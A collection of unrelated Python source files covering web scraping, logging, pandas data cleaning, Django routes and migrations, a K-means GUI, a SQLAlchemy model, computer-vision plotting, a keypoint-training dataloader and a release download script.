newsbox.append("No NEW Issue on KIC\n")
return newsbox
def SoftwareKHU(today1):
url="http://software.khu.ac.kr/board5/bbs/board.php?bo_table=05_01"
html=requests.get(url).text
obj=soup(html, "html.parser")
table=obj.find("div",{"class":"sContainer"}).find("tbody").findAll("tr")
newsbox=[]
for row in table:
date=row.find("td",{"class":"td_datetime"}).text.strip()
if(date==today1):
title=row.find("div",{"class":"bo_tit"}).text.strip()
newsbox.append(title)
if(len(newsbox)==0):
newsbox.append("No New Issue on SW융합대학\n")
return newsbox
'''
dt=datetime.datetime.now()
today=str(dt)
today1=today[0:10]
today2=today[0:10].replace("-",".")
print(SWedu(today1))  # SW project group notices
print(KIC(today2))  # KIC (International College) notices
print(SoftwareKHU(today1))  # Software-centered university notices
'''
|
import logging
from logging.handlers import (RotatingFileHandler,
QueueHandler,
QueueListener)
from fansettings import LOG_PATH
f = logging.Formatter('%(asctime)s: %(name)s|%(processName)s|%(process)s|%(levelname)s -- %(message)s')
def getFanLogger(name=None, level=logging.INFO):
if name is None:
name = __name__
log = logging.getLogger(name)
log.setLevel(level)
log.propagate = False
return log
def getFanListener(q, name=None, level=logging.INFO):
    if name is None:
        name = __name__
    log = getFanLogger(name, level)
    fh = RotatingFileHandler(LOG_PATH, maxBytes=8192, backupCount=5)
    fh.setFormatter(f)
    fh.setLevel(level)
    # A QueueListener is not a Handler: it drains records from the queue and forwards
    # them to its own handlers, so it is started here instead of being attached to the
    # logger with addHandler().
    listener = QueueListener(q, fh)
    listener.start()
    return log, listener
def getFanHandler(q, name=None, level=logging.INFO):
if name is None:
name = __name__
log = getFanLogger(name, level)
    qh = QueueHandler(q)
qh.setFormatter(f)
log.addHandler(qh)
return log
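# A minimal wiring sketch (assumed, not part of the original module): workers log through
# a QueueHandler while a single started QueueListener writes to the rotating file at LOG_PATH.
if __name__ == "__main__":
    import multiprocessing
    q = multiprocessing.Queue(-1)
    _, listener = getFanListener(q, name="fan.listener")
    worker_log = getFanHandler(q, name="fan.worker")
    worker_log.info("queue logging is wired up")
    listener.stop()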
|
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 15 16:00:47 2017
@author: lcao
"""
import pandas as pd
import numpy as np
import os
import re
# set working directory
os.chdir('D:\Personal\Hackathon\WeiboSum')
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# import statistical data of weibo
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
weibo_stat_1 = pd.read_csv('WeiboStat\Weibo_Stat_1.csv')
weibo_stat_2 = pd.read_csv('WeiboStat\Weibo_Stat_2.csv')
weibo_stat = weibo_stat_1.append(weibo_stat_2)
print weibo_stat_1.shape
print weibo_stat_2.shape
print weibo_stat.shape
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# clean statistical data of weibo
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
weibo_stat.head(1)
# check number of unique funds to detect duplicates
print len(weibo_stat.User_name.values)
'''
check number of NaN
check with WeiboSpyderImplement.py again to see if we can retrieve data from weibo
If not, remove null fund names from weibo_stat
'''
idx = np.where(np.array(pd.isnull(weibo_stat.User_name))==True)[0]
print len(idx)
Users_id = np.array(weibo_stat.iloc[idx]['User_id'])
'''
replace NaN data if new data is retrieved
'''
weibo_stat_3 = pd.read_csv('WeiboStat\Weibo_Stat_3.csv')
for i in range(weibo_stat_3.shape[0]):
user_id = weibo_stat_3.User_id.iloc[i]
weibo_stat.iloc[np.where(np.array(weibo_stat['User_id'])==user_id)[0][0]] = weibo_stat_3.iloc[i]
weibo_stat = weibo_stat.loc[[not x for x in pd.isnull(weibo_stat.User_name)]]
print weibo_stat.shape
'''
check number of fund names end with numbers (suspicious)
check if these user ids are institution ids
'''
M = [re.search(ur'\d+$', x) for x in np.array(weibo_stat.User_name)]
B = [m is None for m in M]
weibo_stat = weibo_stat.ix[B]
print weibo_stat.shape
'''
append fund name to weibo_stat
'''
weibo_user_id1 = pd.read_csv('WeiboStat\Weibo_users_id_1.csv')
weibo_user_id2 = pd.read_csv('WeiboStat\Weibo_users_id_2.csv')
weibo_user_id = weibo_user_id1.append(weibo_user_id2)
print weibo_user_id1.shape
print weibo_user_id2.shape
print weibo_user_id.shape
# left outer join weibo_stat and weibo_user_id by user_id
temp = pd.merge(weibo_stat,weibo_user_id[['User_id','Fund_name']],how='left',on='User_id')
temp.head(1)
temp.shape
temp.drop(temp.columns[0], axis=1, inplace=True)
temp.to_csv('WeiboStat\Weibo_Stat.csv', index = False)
|
from django.urls import path
from django.conf.urls import include, url
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('view/', views.handle_view_file, name='view'),
path('upload/', views.handle_file_upload, name='upload'),
path('risk/', views.handle_column_select, name='risk'),
url(r'^delete/(?P<token>\w+)/$', views.delete_file, name='delete_file'),
]
|
/home/alex/ScienceWork/SUFEX-Kinetics/Calorimetry/Plot/Integrate-Exp-Data.py
|
import tkinter as tk
from tkinter import filedialog as fd
import numpy as np
from fields_analyzer.json_reader import read_json_file
from fields_analyzer.fields_analyzer import select_fields_to_analyze
from algorithm.K_Means import K_Means
from results_and_plotter.clusters_results import cluster_results
from results_and_plotter.results_output import plotter
from results_and_plotter.save_results import save_results,load_results
class App(tk.Tk):
def __init__(self):
super().__init__()
self.size = '500x300'
# configure the root window
self.title('Data Clustering Analyzer')
self.geometry(self.size)
# label
self.label = tk.Label(self, text='Please select the JSON file where the data to analyze is')
self.label.pack( padx=10, pady=10)
# button
self.button = tk.Button(self, text='Browse..', command=self.browse_data)
self.button.pack( padx=10, pady=10)
# label
self.label = tk.Label(self, text='Or load a previous execution, entering the identifier')
self.label.pack(padx=10, pady=10)
self.label = tk.Label(self, text="Identifier")
self.label.pack()
self.entry2 = tk.Entry(self, )
self.entry2.pack()
# button
self.button1 = tk.Button(self, text='Load..', command=self.load_data)
self.button1.pack(padx=10, pady=10)
# check_box
self.save_exe = 0
self.checkbox = tk.Checkbutton(self, text="Save execution", variable=self.save_exe, onvalue=1, offvalue=0,
command=self.isChecked)
self.checkbox.pack( padx=10, pady=10)
self.label = tk.Label(self,text = "Identifier")
self.entry = tk.Entry(self, )
def isChecked(self):
if self.save_exe == 1:
self.save_exe = 0
self.entry.pack_forget()
self.label.pack_forget()
else:
self.save_exe = 1
self.entry.pack()
self.label.pack()
# here we browse the json file and then call the json reader.
def browse_data(self):
filetypes = (
('text files', '*.json'),
('All files', '*.*')
)
filename = fd.askopenfilename(
title='Open JSON file',
initialdir='/home/dnavarro/PycharmProjects/k_means_clustering/data',
filetypes=filetypes)
json_data = read_json_file(filename)
samples_to_analyze, pids_array = select_fields_to_analyze(json_data)
set_to_plot, alive_indexes = np.unique(samples_to_analyze, axis=0, return_index=True)
K_Means_ = K_Means(K=7, max_iterations=150)
pred = K_Means_.predict(samples_to_analyze)
if self.save_exe == 1:
save_results(self.entry.get(),pred.astype(int), set_to_plot, alive_indexes, samples_to_analyze, pids_array)
cluster_results(pred.astype(int), pids_array)
plotter(pred.astype(int), set_to_plot, alive_indexes)
def load_data(self):
if len(self.entry2.get()) > 0:
dp = load_results(self.entry2.get())
cluster_results(dp["pred"], dp["pids_array"])
plotter(dp["clusters"], dp["set_to_plot"], dp["alive_indexes"])
|
a = input().split()
result = ''
for i in range(len(a)):
if len(a) == 1:
result += a[i]
else:
if i != len(a) - 1:
t = int(a[i - 1]) + int(a[i + 1])
result += str(t) + " "
else:
t = int(a[i - 1]) + int(a[0])
result += str(t)
print(result)
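# Worked example (assumed input): "1 2 3" -> each position gets the sum of its two
# neighbours with wrap-around, so the output is "5 4 3".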
|
# Generated by Django 3.0.5 on 2020-08-13 10:42
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('authentication', '0005_auto_20200813_1014'),
]
operations = [
migrations.RenameField(
model_name='attendance',
old_name='logindate',
new_name='login',
),
migrations.RenameField(
model_name='attendance',
old_name='logoutdate',
new_name='logout',
),
migrations.RemoveField(
model_name='attendance',
name='logintime',
),
migrations.RemoveField(
model_name='attendance',
name='logouttime',
),
]
|
# Default responses
# -*- coding: latin-1 -*-
opciones = {
"users": {"Pablo Marinozi","Facundo Bromberg","Diego Sebastián Pérez","Carlos Ariel Díaz","Wenceslao Villegas","Juan Manuel López Correa"},
"inclusion_criteria": ("El estudio utiliza algún proceso de extracción de información automatizado sobre imágenes de cualquier región del espectro electromagnético en alguna de sus etapas.",
"El estudio se enfoca en la medición de variables de interés vitícola indistintamente de la ubicación geográfica y el sistema de conducción de los viñedos y del varietal y propósito de comercialización de las uvas."),
"exclusion_criteria": ("El estudio utiliza como entrada imágenes satelitales.",
"El algoritmo opera sobre información electromagnética que no viene en forma de imagen (entiéndase representación visual bidimensional a partir de una matriz numérica) ",
"El paper está orientado a automatismo de la gestión, no a medición de variables.",
"El estudio no está escrito en Inglés.",
"La publicación del estudio no se sometió a un proceso de revisión por pares."),
"dataset_format_list" : {"Fotografías Aisladas", "Fotogramas de videos"},
"viticultural_objects_list" : {"Bayas (Racimos)", "Bayas (Granos)", "Hojas (Individuales)", "Hojas (Canopia)",
"Yemas", "Tronco"},
"data_capture_conditions_list" : {"Condiciones naturales de campo", "Condiciones controladas en el campo",
"Condiciones controladas en el laboratorio"},
"electromagnetic_spectrum_list" : {"Espectro Visible", "Infrarrojo", "Multiespectral", "Hiperespectral"},
"camera_types_list" : {"Monocular", "Stereo", "Profundidad"},
"visual_tasks_list" : {
"Segmentación 2D de objetos de interés.",
"Detección 2D de objetos de interés (bounding box)",
"Detección 2D de objetos de interés (centro de masa)",
"Detección 2D de objetos de interés (máscara del objeto 2D)",
"Detección 3D de objetos de interés (bounding box)",
"Detección 3D de objetos de interés (centro de masa)",
"Detección 3D de objetos de interés (máscara del objeto 3D)",
"Reconstrucción 3D de objetos de interés.",
"Identificación/Diferenciación 2D/3D de instancias de objeto de interés.",
"Tracking de objetos de interés"},
"visual_features_types": {"Handcrafted", "Latent", "Deep"},
"visual_features_handcrafted_list" : {
"Máscaras de Textura de Laws",
"Filtros de Gabor",
"SGF (Steerable Gaussian Filter)",
"Histogramas de color",
"CCV (Color Coherence Vector)",
"Histogramas de Momentos de Color",
"CC (Color Correlogram)",
"GCM (Gray-level Co-occurrence Matrix)",
"Contexto de Forma (Shape Context)",
"Momentos Geométricos",
"HOG (Histogram of Oriented Gradients)",
"SIFT (Scale-Invariant Feature Transform)",
"SURF (Speeded-Up Robust Features)",
"ORB (Oriented FAST and rotated BRIEF)"},
"visual_features_latent_list" : {
"PCA (Principal Component Analysis)",
"Kernel PCA (Kernel Principal Component Analysis)",
"MDS (Multidimensional Scaling",
"Isomap",
"Laplacian Eigenmaps"},
"visual_features_deep_list" : {
"AlexNet",
"VGG group",
"LeNet",
"GoogleNet",
"Inception"},
"algorithms_list" : {"SVM (Support Vector Machines)", "Multilayer Perceptron"},
"viticultural_variable_list" : {
"Flower number",
"Berry maturity",
"Berry number",
"Berry weight" ,
"Berry size",
"Berry volume",
"Cluster compactness (density)",
"Cluster morphology (length, width, size, elongation)",
"Cluster volume",
"Cluster number",
"Cluster weight",
"Yield",
"Leaf Area"},
"viticultural_aspects_list" : {
"Información cuantitativa de la producción",
"Calidad de la producción",
"Estado general del viñedo"},
"research_goal_list" : {
"Disminuir costos en procesos productivos.",
"Reducir la laboriosidad de las tareas manuales llevadas adelante por el personal.",
"Posibilitar las mediciones actuales en escala masiva/mayor granularidad espacio-temporal.",
"Posibilitar la medición de variables más complejas/sutiles que las actuales."},
"practical_contibution_list" : {
"Producto terminado de código abierto.",
"Producto terminado privativo.",
"Implementación de código abierto de los modelos de CV",
"Ninguna de las anteriores."}
}
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 25 17:23:19 2019
@author: HP
"""
def Extended_Euclidean(a,b):
if b==0:
return 1,0,a
else:
m,n,gcd1=Extended_Euclidean(b,a%b)
x=n
y=m-int(a/b)*n
gcd=gcd1
return x,y,gcd
print(Extended_Euclidean(10,7))
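# Quick sanity check (assumed, not part of the original script): the returned coefficients
# should satisfy Bezout's identity a*x + b*y == gcd.
x, y, g = Extended_Euclidean(10, 7)
assert 10 * x + 7 * y == g == 1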
|
from sqlalchemy import (
Column,
DateTime,
Integer,
Numeric,
String,
UniqueConstraint,
and_
)
from sqlalchemy.orm import relationship, synonym
from bitcoin_acks.constants import ReviewDecision
from bitcoin_acks.database.base import Base
from bitcoin_acks.models import Comments, Labels
from bitcoin_acks.models.pull_requests_labels import PullRequestsLabels
from bitcoin_acks.models.users import Users
class PullRequests(Base):
__tablename__ = 'pull_requests'
__table_args__ = (UniqueConstraint('number',
'repository_id',
name='pull_requests_unique_constraint'),
)
id = Column(String, primary_key=True)
number = Column(Numeric, nullable=False)
is_high_priority = Column(DateTime)
added_to_high_priority = Column(DateTime)
removed_from_high_priority = Column(DateTime)
additions = Column(Integer)
deletions = Column(Integer)
mergeable = Column(String)
last_commit_state = Column(String)
last_commit_state_description = Column(String)
last_commit_short_hash = Column(String)
last_commit_pushed_date = Column(DateTime(timezone=True))
state = Column(String, nullable=False)
title = Column(String, nullable=False)
body = Column(String)
created_at = Column(DateTime(timezone=True), nullable=False)
updated_at = Column(DateTime(timezone=True), nullable=False)
merged_at = Column(DateTime(timezone=True))
closed_at = Column(DateTime(timezone=True))
commit_count = Column(Integer)
review_decisions_count = Column(Integer, default=0)
total_bounty_amount = Column(Integer)
bodyHTML = synonym('body')
createdAt = synonym('created_at')
updatedAt = synonym('updated_at')
mergedAt = synonym('merged_at')
closedAt = synonym('closed_at')
repository_id = Column(Integer, nullable=False)
author_id = Column(String)
tweet_id = Column(Integer, unique=True)
toot_id = Column(Integer, unique=True)
author = relationship(Users,
primaryjoin=author_id == Users.id,
foreign_keys='[PullRequests.author_id]',
backref='pull_requests'
)
review_decisions = relationship(Comments,
primaryjoin=and_(
id == Comments.pull_request_id,
Comments.review_decision != ReviewDecision.NONE,
Comments.author_id != author_id
),
foreign_keys='[Comments.pull_request_id]',
order_by=Comments.published_at.desc())
labels = relationship(Labels,
secondary=PullRequestsLabels.__table__,
primaryjoin=id == PullRequestsLabels.pull_request_id,
secondaryjoin=PullRequestsLabels.label_id == Labels.id,
# foreign_keys='[Labels.pull_request_id]',
backref='pull_request',
order_by=Labels.name)
@property
def html_url(self):
url = 'https://github.com/bitcoin/bitcoin/pull/{0}'
return url.format(self.number)
def __repr__(self):
return f'{self.number} {self.title}'
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 28 13:00:48 2019
@author: Ananthan
"""
import numpy as np
import seaborn as sns
import matplotlib.pylab as plt
import pandas
# Works well for roughly 675 input files, but labels become poor with many more or fewer.
def plot_heat_map(matrix,path, title):
# height = plt.rcParams['font.size'] * matrix.shape[0] / 10
# width = plt.rcParams['font.size'] * matrix.shape[1] / 10
sns.set(font_scale=0.0035)
    fig, ax = plt.subplots(figsize=(2^15, 2^15))  # note: ^ is bitwise XOR, so this evaluates to a 13 x 13 inch figure
# p=sns.heatmap(matrix,vmin= 0.0, vmax = 1.0, linewidths=0.0, square=True, xticklabels=True, yticklabels=True).set_title(title)
p=sns.heatmap(matrix,linewidths=0.0, square=True, xticklabels=True, yticklabels=True).set_title(title)
p.figure.savefig(path, bbox_inches='tight')
plt.clf()
def run_plots(PLOTPATHS):
for matname in PLOTPATHS:
m = pandas.read_csv(matname, index_col=0)
plot_heat_map(m, matname[:-4] + "_heat.pdf", matname[:-4])
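# A minimal usage sketch (assumed): render a heat map PDF next to every matrix CSV in
# the working directory.
if __name__ == "__main__":
    import glob
    run_plots(glob.glob("*.csv"))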
|
#!/usr/bin/python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Python script used to filter the list of junit XML test results
# to those that contain errors or failures.
#
import sys
import fileinput
import xml.etree.ElementTree
for line in fileinput.input():
suite = xml.etree.ElementTree.parse(line.rstrip()).getroot()
errors = suite.get("errors")
failures = suite.get("failures")
if (errors is not None and int(errors) > 0) or (failures is not None and int(failures) > 0):
sys.stdout.write(line)
sys.exit(0)
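# Typical invocation (assumed): pipe a list of junit XML report paths on stdin, e.g.
#   find . -name "TEST-*.xml" | python filter_failed_tests.py
# where "filter_failed_tests.py" stands in for whatever this script is saved as.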
|
import os
from matplotlib import pyplot as plt
from shapely.geometry import Point
import cv2
import numpy as np
from objects.constants import Constants
from objects.homography import Homography
from objects.images import TestImage, TemplateImage
from objects.plot_discarded import PlotDiscarded
default_backend = None
def setup_backend():
if os.uname()[0] == 'Linux':
import matplotlib
matplotlib.use('TkAgg')
def setup_backend_for_saving():
global default_backend
import matplotlib
default_backend = matplotlib.get_backend()
matplotlib.use('Agg')
def restore_backend():
global default_backend
import matplotlib
matplotlib.use(default_backend)
def __get_path(name):
n = name.lower().replace(' ', '_')
path = Constants.SAVING_FOLDER_PATH + '/' + n
if not os.path.exists(path):
os.mkdir(path)
return path
def save_homographies(test_image: TestImage, homographies: [Homography], template: TemplateImage = None,
before_overlap=False, before_filters=False):
plt.clf()
if before_filters:
plt.imshow(test_image)
else:
plt.imshow(test_image.image)
if template is not None:
name = template.name.upper()
title = 'Show all items found in template {}'.format(name)
save = '/Show_items_found_in_template_{}.png'.format(name)
elif before_overlap:
title = 'Show all items found before overlap removing'
save = '/Show_all_items_found_before_overlap_removing.png'
elif before_filters:
title = 'Show all items found before filters'
save = '/Show_all_items_found_before_filters.png'
else:
title = 'Show all items found'
save = '/Show_items_found.png'
plt.title(title)
for homography in homographies:
x, y = homography.polygon.exterior.xy
plt.plot(x, y, linewidth=2, color='r')
x_c, y_c = homography.polygon.centroid.coords.xy
x_c = round(x_c[0])
y_c = round(y_c[0])
# plt.text(x_c, y_c, homography.template.name + "-" + str(homography.id_hom_global), horizontalalignment='center',
# verticalalignment='center', fontsize=4, bbox=dict(facecolor='white', alpha=0.5))
plt.savefig(Constants.SAVING_FOLDER_PATH + save, dpi=400, format='png')
def save_homographies_for_template(test_image: TestImage, homographies: [Homography]):
homographies_dict = {}
for homography in homographies:
name = homography.template.name
if name not in homographies_dict:
homographies_dict[name] = []
homographies_dict[name].append(homography)
for k, v in homographies_dict.items():
for homography in v:
plt.clf()
plt.imshow(test_image.image)
name = k.upper()
iid = str(homography.id_hom_global)
iid = iid.replace('.', '-')
title = 'Show all items found in template after filters {}-{}'.format(name, iid)
save = '/Show_items_found_in_template_{}_after_filters_{}.png'.format(name, iid)
plt.title(title)
x, y = homography.polygon.exterior.xy
plt.plot(x, y, linewidth=2, color='r')
x_c, y_c = homography.polygon.centroid.coords.xy
x_c = round(x_c[0])
y_c = round(y_c[0])
plt.text(x_c, y_c, homography.template.name + "-" + str(homography.id_hom_global),
horizontalalignment='center',
verticalalignment='center', fontsize=4, bbox=dict(facecolor='white', alpha=0.5))
plt.savefig(Constants.SAVING_FOLDER_PATH + save, dpi=400, format='png')
def save_homographies_report(test_image, homographies: [Homography]):
plt.clf()
fig = plt.figure(constrained_layout=False)
gs = fig.add_gridspec(nrows=3, ncols=4)
ax1 = fig.add_subplot(gs[:-1, 0])
ax2 = fig.add_subplot(gs[-1, 0])
ax3 = fig.add_subplot(gs[:, 1:])
axs = [ax1, ax2, ax3]
# fig, axs = plt.subplots(1, 3)
for ax in axs:
ax.set_xticks([], [])
ax.set_yticks([], [])
for i, homography in enumerate(homographies):
axs[i].imshow(homography.template.image)
x, y = homography.polygon.exterior.xy
if homography.template.name == 'CIOCCOLATO_FONDENTE':
color = 'r'
label = 'Chocolate'
else:
color = 'b'
label = 'Special-k'
axs[i].set_title(label)
axs[2].imshow(test_image.image)
axs[2].set_title('Items found')
axs[2].plot(x, y, linewidth=2, color=color, label=label)
axs[2].legend(loc='lower center')
plt.savefig(Constants.SAVING_FOLDER_PATH + '/Show_all_items_report.png', dpi=400, format='png')
def save_keypoints_report(good_matches, test_keypoints, image, name):
# test_image.image, good_matches, test_keypoints, hotpoints_image_after_elaboration, template.name
# test, good_matches, keypoints, hotpoint, name
keypoints_mask = np.ones(image.shape, dtype=np.uint8) * 255
good_keypoints = []
for good_match in good_matches:
dst_pt = test_keypoints[good_match.queryIdx]
good_keypoints.append(dst_pt)
test_keypoints_image = cv2.drawKeypoints(keypoints_mask, good_keypoints, None)
path = __get_path(name)
plt.clf()
fig, axs = plt.subplots(1, 2)
for ax in axs:
ax.set_xticks([], [])
ax.set_yticks([], [])
# fig.suptitle('Hotpoints')
axs[0].imshow(image)
axs[1].imshow(test_keypoints_image, cmap='Greys')
save = path + '/Keypoints_report.png'
plt.savefig(save, dpi=400, format='png')
def save_hotpoints(image, name, again=False):
path = __get_path(name)
plt.clf()
plt.imshow(image, cmap='Greys')
if again:
title = 'Hotpoints recomputed'
save = path + '/Hotpoints_again.png'
else:
title = 'Hotpoints'
save = path + '/Hotpoints.png'
plt.title(title)
plt.savefig(save, dpi=400, format='png')
def save_hotpoints_report(test, good_matches, keypoints, hotpoint, name):
keypoints_mask = np.ones(test.shape, dtype=np.uint8) * 255
good_keypoints = []
for good_match in good_matches:
dst_pt = keypoints[good_match.queryIdx]
good_keypoints.append(dst_pt)
test_keypoints_image = cv2.drawKeypoints(keypoints_mask, good_keypoints, None)
path = __get_path(name)
plt.clf()
fig, axs = plt.subplots(1, 3)
for ax in axs:
ax.set_xticks([], [])
ax.set_yticks([], [])
# fig.suptitle('Hotpoints')
axs[0].imshow(test)
axs[1].imshow(test_keypoints_image, cmap='Greys')
axs[2].imshow(hotpoint, cmap='Greys')
save = path + '/Hotpoints_report.png'
plt.savefig(save, dpi=400, format='png')
def save_window(test_image, id_hotpoint, id_pos, id_homography, window, inliers_matches, test_keypoints, name):
plt.clf()
plt.imshow(test_image)
plt.title("{}.{}.{} Window keypoints inside".format(id_hotpoint, id_pos, id_homography))
# Plot window
x, y = window.exterior.xy
plt.plot(x, y, linewidth=1, color='g')
# Plot inliers
for i, match in enumerate(inliers_matches):
point = Point(test_keypoints[match.queryIdx].pt)
x, y = point.x, point.y
if window.contains(point):
plt.scatter(x, y, c='r', s=2, marker='x')
path = __get_path(name)
plt.savefig(path + "/{}.{}.{} (a) Window keypoints inside.png".format(id_hotpoint, id_pos, id_homography),
dpi=400, format="png")
def save_two_polygons(test_image, id_hotpoint, id_pos, id_homography, object_polygon1, object_polygon2, name):
plt.clf()
plt.imshow(test_image)
plt.title("{}.{}.{} Compare polygons".format(id_hotpoint, id_pos, id_homography))
try:
x, y = object_polygon1.exterior.xy
except:
x = []
y = []
plt.plot(x, y, linewidth=3, color='r')
try:
x, y = object_polygon2.exterior.xy
except:
x = []
y = []
plt.plot(x, y, linewidth=2, color='b')
plt.legend(['BEFORE', 'AFTER'])
path = __get_path(name)
plt.savefig(path + "/{}.{}.{} (b) Compare polygons.png".format(id_hotpoint, id_pos, id_homography),
dpi=400, format="png")
def save_inliers(test_image, id_hotpoint, id_pos, id_homography, object_polygon_found, inliers_found, test_keypoints,
name):
plt.clf()
plt.imshow(test_image)
plt.title("{}.{}.{} Inliers".format(id_hotpoint, id_pos, id_homography))
x, y = object_polygon_found.exterior.xy
plt.plot(x, y, linewidth=3, color='g')
for match in inliers_found:
point = Point(test_keypoints[match.queryIdx].pt)
x, y = point.x, point.y
plt.scatter(x, y, c='r', s=2, marker='x')
path = __get_path(name)
plt.savefig(path + "/{}.{}.{} (c) Inliers.png".format(id_hotpoint, id_pos, id_homography),
dpi=400, format="png")
def save_discarded_homography(object_polygon, name, idd, text_title, text_label):
x, y = object_polygon.exterior.xy
title = "HOMOGRAPHY DISCARDED " + text_title
path = __get_path(name)
return PlotDiscarded(x, y, title, path, idd, text_label)
|
import numpy as np
import torch
import cv2
import os
import glob
import random
from photometric_augumentation import *
from homography_transform import *
def space_to_depth(inp, grid):
    if len(inp.shape) != 2:
raise ShapeError("input should be 2D-Tensor")
h, w = inp.shape[0], inp.shape[1]
hc = h // grid
wc = w // grid
oup = inp.reshape(hc, grid, wc, grid)
oup = oup.permute(0, 2, 1, 3)
oup = oup.reshape(hc, wc, grid*grid)
return oup
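# Example (sketch, not from the original code): for a 240x320 tensor and grid=8,
# space_to_depth returns shape (30, 40, 64) -- each 8x8 cell is flattened into
# the last axis:
#   >>> space_to_depth(torch.zeros(240, 320), 8).shape
#   torch.Size([30, 40, 64])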
class Dataloader(object):
def __init__(self, root):
self.root = root
self.dataset = []
def get_dataset(self, types):
dirs = os.listdir(self.root)
for dir in dirs:
images = self.root + '/' + dir + '/' + 'images'
points = self.root + '/' + dir + '/' + 'points'
images_training = images + '/' + types
points_training = points + '/' + types
for image in glob.glob(images_training + '/*.png'):
dicts = {}
dicts['image'] = image
dicts['point'] = points_training + '/' + image.split('.')[0].split('/')[-1] + '.npy'
self.dataset.append(dicts)
random.shuffle(self.dataset)
def photometric_augmentation(self, image):
noise_image = image.copy()
#noise_image = cv2.GaussianBlur(noise_image, (21, 21), 0)
noise_image = random_brightness(noise_image)
noise_image = random_contrast(noise_image)
noise_image = additive_gaussian_noise(noise_image)
noise_image = additive_speckle_noise(noise_image)
noise_image = add_shade(noise_image)
noise_image = add_fog(noise_image)
noise_image = motion_blur(noise_image)
return noise_image
def process_label(self, points, H, W):
points = points.astype('int')
label = np.zeros((H, W),int)
label[points[:, 0], points[:, 1]] = 1
label = torch.from_numpy(label).float()
label = space_to_depth(label, 8)
label = torch.cat([2*label,
torch.ones(label.shape[0],
label.shape[1], 1)], 2)
label = torch.argmax(label, 2).unsqueeze(0).cuda()
return label
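    # Note: the returned label has shape (1, H/8, W/8). A cell that contains an
    # interest point gets the flattened position (0-63) of that point within its
    # 8x8 patch; empty cells get 64, the "no keypoint" class also used for the
    # empty-label case in load() below.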
def compute_validmask(self, H, W, homography=None, border=4):
mask = np.ones((H-2*border, W-2*border))
mask = cv2.copyMakeBorder(mask,border,border,border,border,cv2.BORDER_CONSTANT,value=0)
if homography is not None:
            mask = cv2.warpPerspective(mask, homography, (W, H), flags=cv2.INTER_NEAREST)
return mask
def pre_process(self, image):
H, W = image.shape[0], image.shape[1]
inp = image.copy()
inp = inp.astype('float')/255.0
inp = torch.from_numpy(inp)
inp = inp.reshape(1, 1, H, W)
inp = inp.cuda().float()
return inp
def load(self, index):
sub_dict = self.dataset[index]
image = cv2.imread(sub_dict['image'],0)
image = cv2.resize(image, (320, 240))
H, W = image.shape[0], image.shape[1]
homography1 = sample_homography(H, W)
homography2 = sample_homography(H, W)
image1 = self.photometric_augmentation(image)
image2 = self.photometric_augmentation(image)
image1 = cv2.warpPerspective(image1, homography1, (W, H))
image2 = cv2.warpPerspective(image2, homography2, (W, H))
mask1 = self.compute_validmask(H, W, homography1)
mask2 = self.compute_validmask(H, W, homography2)
inps = torch.cat((self.pre_process(image1),
self.pre_process(image2)), dim=0)
points = np.load(sub_dict['point'])
        if points.shape[0] != 0:
            points = 2 * points
points1 = warp_points(points, homography1, H, W)
points2 = warp_points(points, homography2, H, W)
label1 = self.process_label(points1, H, W)
label2 = self.process_label(points2, H, W)
labels = torch.cat((label1, label2), dim=0)
else:
labels = torch.empty(2, H//8, W//8)
labels = labels.fill_(64).cuda()
mask1 = space_to_depth(torch.from_numpy(mask1), 8)
mask2 = space_to_depth(torch.from_numpy(mask2), 8)
mask1 = mask1.bool().any(dim=2).float()
mask2 = mask2.bool().any(dim=2).float()
valid_mask = torch.cat((mask1.unsqueeze(0), mask2.unsqueeze(0)), dim=0)
valid_mask = valid_mask.cuda().float()
labels = labels.long()
return inps, labels, valid_mask
|
import os
import shutil
import StringIO
import urlparse
import zipfile
import requests
VERSION = '0.8'
GITHUB_URL = 'https://github.com/NLeSC/ShiCo/archive/v{}.zip'.format(VERSION)
STATIC_DIR = 'texcavator/static/js/'
DIST = 'ShiCo-{}/webapp/dist/'.format(VERSION)
DIST_DIR = os.path.join(STATIC_DIR, DIST)
FINAL_DIR = os.path.join(STATIC_DIR, 'ShiCo')
# Retrieve the archive from GitHub
print 'Retrieving the archive...'
r = requests.get(GITHUB_URL, stream=True)
z = zipfile.ZipFile(StringIO.StringIO(r.content))
# Extract files from the DIST_DIR to the STATIC_DIR
print 'Unpacking...'
for f in z.namelist():
if f.startswith(DIST):
z.extract(f, STATIC_DIR)
# Move the files to the ShiCo folder
print 'Moving to ShiCo folder...'
shutil.rmtree(FINAL_DIR, ignore_errors=True)
shutil.move(DIST_DIR, STATIC_DIR)
os.rename(os.path.join(STATIC_DIR, 'dist'), FINAL_DIR)
shutil.rmtree(os.path.join(STATIC_DIR, 'ShiCo-{}'.format(VERSION)))
# Replace relative paths with absolute paths
print 'Replacing paths...'
with open(os.path.join(FINAL_DIR, 'scripts/app.js'), 'r+') as f:
lines = []
for line in f:
line = line.replace('config.json', urlparse.urljoin('/static/js/ShiCo/', 'config.json'))
line = line.replace('/help/', urlparse.urljoin('/static/js/ShiCo/', 'help/'))
lines.append(line)
f.seek(0)
f.truncate()
for line in lines:
f.write(line)
|
# coding: utf-8
import os.path as osp
import pandas as pd
from ddf_utils.io import open_google_spreadsheet, serve_datapoint, dump_json
from ddf_utils.str import to_concept_id
from ddf_utils.package import get_datapackage
DOCID = '1hhTERVDWDyZh-efUPtMrcdUYWzXBlIbrOIhZwegXSi8'
SHEET = 'data-for-countries-etc-by-year'
DIMENSIONS = ['geo', 'time']
OUT_DIR = '../../'
